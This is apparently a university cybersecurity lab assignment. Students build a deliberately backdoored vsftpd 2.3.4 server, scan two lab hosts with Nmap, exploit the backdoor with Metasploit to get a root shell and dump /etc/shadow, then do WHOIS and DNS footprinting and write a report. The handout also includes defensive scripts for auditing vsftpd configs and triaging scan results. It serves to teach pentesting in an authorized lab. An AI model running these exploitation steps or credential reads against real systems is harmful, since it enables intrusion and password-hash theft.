CTCH 690 9040: Unit 4 Assignment: Project 2 Part B: Performing a Penetration Test

Unit 4 Assignment: Project 2 Part B: Performing a Penetration Test

Instructions

Perform the following exercises in MARS, the virtual learning environment. Follow the steps in each exercise, taking screenshots as you go along and inputting the information and documentation in a Word document using the template provided in the submission instructions.

Lab Setup: Setting up Vulnerable FTP Service

To facilitate penetration testing and enhance your understanding of security vulnerabilities, you will intentionally install a vulnerable FTP server (vsftpd 2.3.4) on your Ubuntu machine. Please note that this step is optional. If you want, you can skip ahead to the penetration test.

Instructions

  1. Proceed with the installation of a vulnerable FTP service by cloning the following GitHub repository:
    git clone https://github.com/vulnerable/ftp.git
A terminal window shows a git clone command being executed. Below the command, the terminal displays progress messages indicating that objects were enumerated, received, and resolved successfully.

  2. Next, install the packages needed for a build environment. Specifically, install “build-essential”, which contains the components needed to compile basic software written in C and C++. Change into the cloned directory and run the following commands:
  • cd vsftpd-2.3.4-infected.git
  • sudo apt-get install build-essential
A command to install build-essential using sudo apt-get is executed, triggering a list of required and suggested packages. The output shows the system calculating the installation size, requesting confirmation to continue, and beginning to download the necessary packages. The helper script is then made executable:
root@UBUNTU:~/Downloads/vsftpd-2.3.4-infected# chmod +x vsf_findlibs.sh

  3. Before initiating the build process, make a slight modification to the “Makefile” by adding “-lcrypt” to the “LINK” flag. Open the “Makefile” for editing with the “nano” text editor:

nano Makefile

A Makefile opened in GNU nano highlights the LINK = -Wl,-s,-lcrypt line with a red arrow pointing to the -lcrypt flag. Several compiler variables and a long list of object files appear below as part of the build configuration.

  4. After making the necessary changes to the “Makefile”, run make:

root@UBUNTU:~/Downloads/vsftpd-2.3.4# make

A make command is executed, and the build process begins compiling multiple source files with repeated gcc -c entries. The output lists each C file being compiled using the specified flags and include paths.

  5. Upon successful execution of the command, you’ll observe a binary file named “vsftpd” generated in the current directory.
A directory listing shows many source and object files, with arrows highlighting the newly created vsf_findlibs.sh script and the vsftpd binary. The files appear in mixed colors, indicating different file types generated after compiling the project.

  6. Before executing the generated binary, you need to set up some prerequisites. Create a user named “nobody” and a directory named “empty”. On Ubuntu, the user “nobody” is typically available by default, but if not, you’ll create it.

sudo useradd nobody
sudo mkdir /usr/share/empty

  7. To proceed, copy the executable and the configuration files to their respective directories so the application can run properly.

sudo cp vsftpd /usr/local/sbin/vsftpd
sudo cp vsftpd.8 /usr/local/man/man8
sudo cp vsftpd.conf.5 /usr/local/man/man5
sudo cp vsftpd.conf /etc

  8. To set up anonymous access to the FTP server, create a directory and add it to the user configuration.

sudo mkdir /var/ftp/
useradd -d /var/ftp ftp

A series of setup commands is shown, beginning with sudo useradd nobody followed by multiple sudo commands that create directories, copy the vsftpd binary and configuration files, set ownership, adjust permissions, and start the service. These commands are highlighted in red boxes to emphasize each step in the installation and configuration process.

  9. To add a rule allowing traffic on port 21 (FTP) to the INPUT chain of the iptables firewall on the Ubuntu server, use the following command:

sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT

A command is entered to allow incoming FTP traffic by adding an iptables rule using sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT. No output appears afterward, indicating the rule was applied without errors.

  10. To enable local user login in vsftpd, uncomment the “local_enable” line in the vsftpd configuration file (/etc/vsftpd.conf). Open the configuration file for editing:

sudo nano /etc/vsftpd.conf

A configuration file open in GNU nano shows the anonymous_enable=YES and local_enable=YES settings, each highlighted with red arrows. Several commented lines above them describe these options and explain default FTP behavior.

  11. Now start the vsftpd service with the following command:

sudo /usr/local/sbin/vsftpd

A command is entered to start the FTP service using sudo /usr/local/sbin/vsftpd, highlighted with a red box. No output appears beneath the command, indicating it ran without errors or visible messages.
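The /etc/vsftpd.conf edit above deliberately leaves anonymous_enable=YES, which is the setting the pentest later rates as a finding. The following script is an added example (not part of the handout or of vsftpd) showing how a defender would audit such a file: it parses the config the way vsftpd does (one option=value per line, “#” comments), applies the defaults documented in vsftpd.conf(5) for options the file omits, reports the risky settings, and writes a hardened copy. The severity labels are this example's own assumptions; the handout itself only rates anonymous FTP as medium.

```python
"""Audit a vsftpd.conf for the settings this lab turns on deliberately.

Added example, not part of the course handout or of vsftpd. Parses the file
like vsftpd (option=value lines, '#' comments), fills in documented defaults
for missing options, reports risky settings and emits a hardened copy.
"""
from __future__ import annotations

# option -> (vsftpd default, value that is a finding, hardened value, severity, reason)
# Defaults are those documented in vsftpd.conf(5); severities are assumed.
RISKY_OPTIONS = {
    "anonymous_enable":        ("YES", "YES", "NO",  "medium", "anonymous logins are permitted"),
    "anon_upload_enable":      ("NO",  "YES", "NO",  "high",   "anonymous users may upload files"),
    "anon_mkdir_write_enable": ("NO",  "YES", "NO",  "high",   "anonymous users may create directories"),
    "write_enable":            ("NO",  "YES", "NO",  "medium", "FTP write commands are permitted"),
    "chroot_local_user":       ("NO",  "NO",  "YES", "medium", "local users are not confined to their home"),
    "ssl_enable":              ("NO",  "NO",  "YES", "medium", "logins and data cross the network in cleartext"),
}


def parse_vsftpd_conf(text: str) -> dict[str, str]:
    """Return the active option=value pairs; a repeated option keeps its last value."""
    options: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        options[key.strip()] = value.strip()
    return options


def audit_vsftpd_conf(text: str) -> list[dict]:
    """One finding per risky option, using vsftpd's default when the file omits it."""
    options = parse_vsftpd_conf(text)
    findings = []
    for option, (default, bad, good, severity, reason) in RISKY_OPTIONS.items():
        effective = options.get(option, default).upper()
        if effective == bad:
            findings.append({"option": option, "value": effective,
                             "set_in_file": option in options,
                             "severity": severity, "reason": reason,
                             "fix": f"{option}={good}"})
    return findings


def harden_vsftpd_conf(text: str) -> str:
    """Rewrite the config so every risky option carries its hardened value.

    Existing lines for an option are replaced in place (comments are kept);
    options the file never set are appended at the end.
    """
    hardened = {opt: spec[2] for opt, spec in RISKY_OPTIONS.items()}
    seen, out = set(), []
    for raw in text.splitlines():
        line = raw.strip()
        key = line.partition("=")[0].strip() if line and not line.startswith("#") else None
        if key in hardened:
            out.append(f"{key}={hardened[key]}")
            seen.add(key)
        else:
            out.append(raw)
    for key, value in hardened.items():
        if key not in seen:
            out.append(f"{key}={value}")
    return "\n".join(out) + "\n"


# Constructed sample mirroring the values the lab sets in /etc/vsftpd.conf.
SAMPLE_CONF = """\
# Allow anonymous FTP? (Beware - allowed by default if you comment this out).
anonymous_enable=YES
# Uncomment this to allow local users to log in.
local_enable=YES
#write_enable=YES
listen=YES
"""

if __name__ == "__main__":
    for f in audit_vsftpd_conf(SAMPLE_CONF):
        origin = "set in file" if f["set_in_file"] else "vsftpd default"
        print(f"[{f['severity']}] {f['option']}={f['value']} ({origin}): {f['reason']} -> {f['fix']}")
    print(harden_vsftpd_conf(SAMPLE_CONF))
```

Note that two of the three findings on the sample come from options the file never mentions: that is why the audit has to know the compiled-in defaults rather than only reading what is written, and why a commented-out `#write_enable=YES` is correctly not reported.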

Exercise 1: Penetration Testing

Objective: Perform a rigorous penetration test on a structured virtual network environment, designed with intentional vulnerabilities.

Instructions

For this lab, you’ve been tasked by the University of Maryland to conduct a penetration test on their internal network and web application. This is a grey box approach, meaning you have limited knowledge of the network and application architecture.

Machine Details:

  1. Ubuntu Machine:
    • IP Address: 10.11.14.86
  2. Windows 10 Machine:
    • IP Address: 10.11.14.85

Web Application Details:

Your objective is to assess the security posture of the network and the OWASP Juice Shop web application, identify vulnerabilities, and provide recommendations for remediation.

  1. To perform network enumeration using Nmap, follow these steps:
    1. Open a terminal on your Kali Linux machine.
    2. Use the following command to scan the network and gather information about hosts and open ports:

└─# nmap -sC -sV 10.11.14.86 10.11.14.85 -oN pentest.txt

An Nmap command (nmap -sC -sV 10.11.14.86 10.11.14.85 -oN pentest.txt) is highlighted at the top of the screen. Below it, the scan results show an open FTP port running vsftpd 2.3.4 with anonymous login allowed and detailed FTP server status information.
The scan output lists open ports and service versions for two hosts, showing SSH and XRDP services on one system and SSH, RPC, NetBIOS, HTTPS, and VRDP services on the other. Each host entry includes detailed SSH host keys and protocol information.
A network scan output displays detailed information for a Windows host, including RDP service details, certificate dates, MAC address, and HTTPAPI service data. Additional host script results show SMB settings such as message‑signing status and NetBIOS information.

  2. The nmap scan has been completed, revealing two hosts with several ports and services open. Now it’s time to delve deeper into enumeration. First, focus on port 21. According to the nmap output, the FTP port is open on the .86 machine, and fortunately, anonymous FTP is enabled! Connect to the FTP port from your attacker machine (Kali) and explore to see if you can uncover any valuable information.
An FTP connection is initiated to 10.11.14.86, and the login attempt using anonymous credentials succeeds, as indicated by the “230 Login successful” message. The session then identifies the remote system type as UNIX and enters the FTP prompt.

  3. You should have successfully logged in. It appears that the organization is not adhering to best practices. While you didn’t discover anything substantial within the FTP server, you can still classify this as a medium-level risk.
An FTP client issues the dir command, and the server responds that the PORT command succeeded with a suggestion to use passive mode. The server then reports that the directory listing is being sent and completes the transfer successfully.

    1. Upon examining the nmap output, you’ve identified the FTP version as 2.3.4. Conduct a Google search to investigate whether there are any exploits for this particular version of FTP.
    2. Remarkably, you’ve discovered that this version of vsftpd is susceptible to command execution. By following the links provided in the search results, you can learn how this vulnerability is exploited.

A Google search for “vsftpd 2.3.4 exploit” displays results highlighting backdoor command‑execution vulnerabilities associated with this version of VSFTPD. The top links, outlined in red, include entries from Rapid7 and Exploit‑DB referencing the same backdoor exploit.

  4. Additionally, you can utilize Metasploit to search for exploits targeting this specific version. Start Metasploit from your Kali machine.
A command to launch Metasploit (msfconsole) is highlighted at the top of the screen, and the console displays its ASCII‑art banner. Below the banner, Metasploit lists the number of available exploits, payloads, and modules before presenting the msf6 > prompt.
A Metasploit search for “vsftpd 2.3.4” returns one matching module. The highlighted entry shows the VSFTPD v2.3.4 backdoor command‑execution exploit with an excellent ranking.

  5. You can also utilize the “searchsploit” tool, which is already available on your Kali machine, to search for specific exploits targeting applications.
A searchsploit query for “vsftpd 2.3.4” returns a highlighted entry for the VSFTPD 2.3.4 backdoor command‑execution exploit. The result lists the exploit’s file path as unix/remote/17491.rb.

  6. Now that you’ve learned multiple methods to discover exploits, proceed with exploiting this vulnerability using Metasploit, which offers an easy and convenient approach.
  • search vsftpd 2.3.4
A Metasploit search for “vsftpd 2.3.4” displays one matching exploit module in the results. The highlighted entry identifies the VSFTPD v2.3.4 backdoor command‑execution exploit with an excellent ranking.
  • use 0
A Metasploit session shows the use 0 command being run to load the VSFTPD 2.3.4 backdoor exploit, followed by the show options command. The module options displayed include RHOSTS and RPORT settings, with the payload defaulting to cmd/unix/interact.

  7. You only need to configure one option: set RHOSTS (the remote host). In this case, it’s the IP address of the Ubuntu machine. Once you’ve configured this, type either “run” or “exploit” to initiate the exploitation of the target.
  • set RHOSTS 10.11.14.86
A Metasploit command is entered to set the RHOSTS value to 10.11.14.86, and the console confirms the update. The prompt then returns to the VSFTPD backdoor exploit module, waiting for the next command.

  8. You’ve successfully gained access to the Ubuntu machine!
  • exploit
A Metasploit session runs the VSFTPD backdoor exploit, showing that a backdoor service was spawned and a shell was successfully obtained. The output confirms “Command shell session 1 opened” with the target host’s IP address and port details.

  9. Now that you have full access to this machine, you can execute any commands you desire. Run a few commands to explore further. For example:

whoami; hostname

pwd

cat /etc/shadow

ip addr

A command shell obtained through the VSFTPD exploit shows whoami returning “root” and hostname returning “UBUNTU.” The session displays the current directory and the contents of /etc/shadow, indicating full root‑level access.
A command output from ip addr displays several network interfaces, with the eth0 interface showing the IPv4 address 10.11.14.86/28 highlighted. Additional details such as MAC addresses and IPv6 entries appear beneath each interface listing.
  10. Above you can see that you can run commands such as whoami, hostname, ip addr, and cat /etc/shadow. The output shows that you are root, and you can even see the users’ password hashes. At this point, you have fully compromised the Ubuntu machine.
  11. Stop your pentest here, and document all your findings and report to your client. Take your time and perform the same steps on the Windows 10 machine to see whether there are any known vulnerabilities that can be exploited to gain access to the Windows 10 machine as well.
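The nmap -oN output captured at the start of this exercise (pentest.txt) and the documentation requirements of Exercise 3 both call for turning scan results into a findings list. The script below is an added example, not part of the handout or of Nmap: it parses Nmap's normal-output format (host blocks, the port table, and the “|”/“|_” NSE script lines), checks every host against the two authorized IP addresses, and applies a few defender-oriented rules so the findings section of the report can be generated from the scan rather than typed by hand. SAMPLE_SCAN is constructed to resemble the lab's results (its banners and the out-of-scope third host are invented), and every severity except the handout's “medium” for anonymous FTP is this example's own rating.

```python
"""Triage an Nmap normal-output (-oN) file into a findings list.

Added example, not part of the handout or of Nmap. It parses the pentest.txt
style output the lab produces, checks each host against the authorized scope
and applies defender-oriented rules (anonymous FTP, the vsftpd 2.3.4 build, SMB
signing not required) so the report's findings can be generated from the scan.
SAMPLE_SCAN is constructed (banners invented); every severity except the
handout's 'medium' for anonymous FTP is this example's own rating.
"""
import re

SCOPE = {"10.11.14.86", "10.11.14.85"}  # authorized targets from the assignment

SAMPLE_SCAN = """\
# Nmap scan initiated as: nmap -sC -sV 10.11.14.86 10.11.14.85 -oN pentest.txt
Nmap scan report for 10.11.14.86
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
3389/tcp open  ms-wbt-server xrdp

Nmap scan report for 10.11.14.85
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Host script results:
| smb2-security-mode:
|_    Message signing enabled but not required

Nmap scan report for 10.11.14.90
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.6
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}


def parse_nmap_normal(text):
    """Return hosts as {"address", "ports": [...], "host_scripts": [...]}.

    Each port dict holds number, state, service, version and the NSE script
    lines ('| ...' / '|_ ...') printed directly under that port.
    """
    hosts, host, port, in_host_scripts = [], None, None, False
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host = {"address": m.group(1), "ports": [], "host_scripts": []}
            hosts.append(host)
            port, in_host_scripts = None, False
        elif host is None:
            continue  # the '# Nmap ... initiated' header precedes the first host
        elif m := PORT_RE.match(line):
            port = {"number": int(m.group(1)), "state": m.group(3),
                    "service": m.group(4), "version": m.group(5).strip(), "scripts": []}
            host["ports"].append(port)
        elif line.startswith("Host script results:"):
            in_host_scripts = True
        elif line.startswith("|") and (in_host_scripts or port):
            body = line.lstrip("|_ ").strip()
            (host["host_scripts"] if in_host_scripts else port["scripts"]).append(body)
    return hosts


def finding(host, port, severity, title, fix):
    return {"host": host, "port": port, "severity": severity, "title": title, "fix": fix}


def triage(hosts):
    """Apply the rules; out-of-scope hosts are reported, not analysed."""
    findings = []
    for h in hosts:
        addr = h["address"]
        if addr not in SCOPE:
            findings.append(finding(addr, None, "info", "Host outside authorized scope",
                                    "Exclude it from testing and record the deviation in the report."))
            continue
        for p in h["ports"]:
            if p["state"] != "open":
                continue
            if p["service"] == "ftp" and p["version"].startswith("vsftpd 2.3.4"):
                findings.append(finding(addr, p["number"], "critical",
                    "vsftpd 2.3.4 (build with a known backdoor giving command execution)",
                    "Replace with a current vsftpd package; block port 21 at the firewall until then."))
            if any(s.startswith("ftp-anon: Anonymous FTP login allowed") for s in p["scripts"]):
                findings.append(finding(addr, p["number"], "medium", "Anonymous FTP login allowed",
                    "Set anonymous_enable=NO in /etc/vsftpd.conf and restart vsftpd."))
        if any("Message signing enabled but not required" in s for s in h["host_scripts"]):
            findings.append(finding(addr, 445, "low", "SMB signing not required",
                "Enable 'Microsoft network server: Digitally sign communications (always)'."))
    return sorted(findings, key=lambda f: RANK[f["severity"]])  # stable: host order kept


def report_lines(findings):
    """One line per finding, in the order the report should present them."""
    return [f"[{f['severity']}] {f['host']}:{f['port'] or '-'} {f['title']} -> {f['fix']}"
            for f in findings]


if __name__ == "__main__":
    print("\n".join(report_lines(triage(parse_nmap_normal(SAMPLE_SCAN)))))
```

Run it against the real pentest.txt by reading the file into `parse_nmap_normal` instead of SAMPLE_SCAN. The scope check is deliberately the first rule: a host the scan happened to reach but that the engagement did not authorize must never be fed into the exploitation steps, and a report line saying so is what the client expects to see.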

Exercise 2: Footprinting

Objective: Analyze a network of virtual machines to identify security weaknesses and potential breach points.

Instructions

Now, you’ll perform a pentest on their web application.

In the initial phase of web pentesting, start by thoroughly examining the website, understanding its purpose, browsing related forums for discussions, and extensively researching it using Google. The goal is to gather as much information as possible to inform your testing strategy and uncover potential vulnerabilities.

WHOIS

  1. Go to OWASP Juice Shop.
  2. Input the URL: https://juice-shop.herokuapp.com/#/.
A web browser displays the Juice Shop homepage at the URL highlighted by a red arrow. The page shows several product cards featuring items such as apple juice, banana juice, carrot juice, and artwork for sale.
A browser window shows the DomainTools Whois Lookup page with a search bar containing the URL “https://juice‑shop.herokuapp.com/#/”. The blue “SEARCH” button appears to the right of the entered URL on the lookup interface.

  3. By examining the WHOIS output, you can gather valuable information such as DNS details, email addresses, IP addresses, location, name servers, and more. This comprehensive data aids in understanding the domain’s infrastructure and ownership details.
A Whois record page displays registration details for HerokuApp.com, including the registrar (MarkMonitor Inc.), name servers, IP address, hosting location in Virginia, and ASN information. The highlighted section lists domain status values, creation and expiration dates, and other administrative data.

DNS enumeration:

  1. For DNS enumeration, proceed under the assumption that Facebook is a partner, granting you permission to conduct a penetration test on their systems as well. This allows you to expand your scope and explore potential vulnerabilities within the Facebook domain. Limit your attacks to the lab’s scope, and adhere to the bug bounty program’s guidelines. Utilize DNS Dumpster for DNS enumeration to collect information within the authorized scope.
A DNS lookup page displays the message “Showing results for facebook.com” highlighted near the top. Below it, the interface shows a world map with host locations marked in green and a hosting‑information chart on the left.
A DNS results page lists Facebook’s authoritative DNS servers along with their IP addresses and corresponding countries. Below the DNS section, the page displays MX and TXT records, including mail‑server information and several domain‑verification entries.

  2. You have been presented with a substantial amount of information. Please take your time to review it thoroughly. Additionally, you can utilize another tool called OSINT Framework, which is invaluable for information gathering. Feel free to explore the OSINT Framework.
An OSINT Framework diagram displays a central node branching into multiple categories such as usernames, email addresses, domain names, social networks, public records, geolocation tools, and threat intelligence. Each category expands outward as part of a structured visual map used for organizing open‑source intelligence resources.
  3. Since the scope of your web application penetration test was limited to information gathering, you will conclude the assessment at this stage and prepare to present your findings to the client.

Exercise 3: Documentation Requirements

Objective: Document the findings and vulnerabilities uncovered during the penetration testing process.

Instructions

  • Document all commands executed, logs generated, and relevant system activities.
  • Capture screenshots of critical steps, observed alerts, events, and configuration changes made during the testing process.
  • Ensure thorough documentation of created files, usernames, backdoors, and any other modifications made to the system.
  • After documentation is complete, securely delete any created files, and remove any backdoors to maintain system integrity.

Revised Key Findings:

  • Provide a summary of the key findings from each exercise, detailing the outcomes of the penetration testing activities.
  • Describe the effectiveness of the grey box approach and the limited knowledge of the network and application architecture in identifying vulnerabilities.
  • Reflect on the experience of efficiently triaging and cataloging cyber-attacks using specialized tools, highlighting successful mitigation strategies and areas for improvement.
  • State how penetration testing is related to business continuity planning. Justify your response with examples and citations.

Exercise 4: Effective Strategies and Countermeasures

Objective: Compose effective strategies and countermeasures to reinforce the security of the network based on the penetration test results.

Instructions

Based on your Unit 4 Discussion and your work performed in the Unit 4 Assignment, state the strategies and countermeasures to reinforce the security of the network based on the penetration test results.
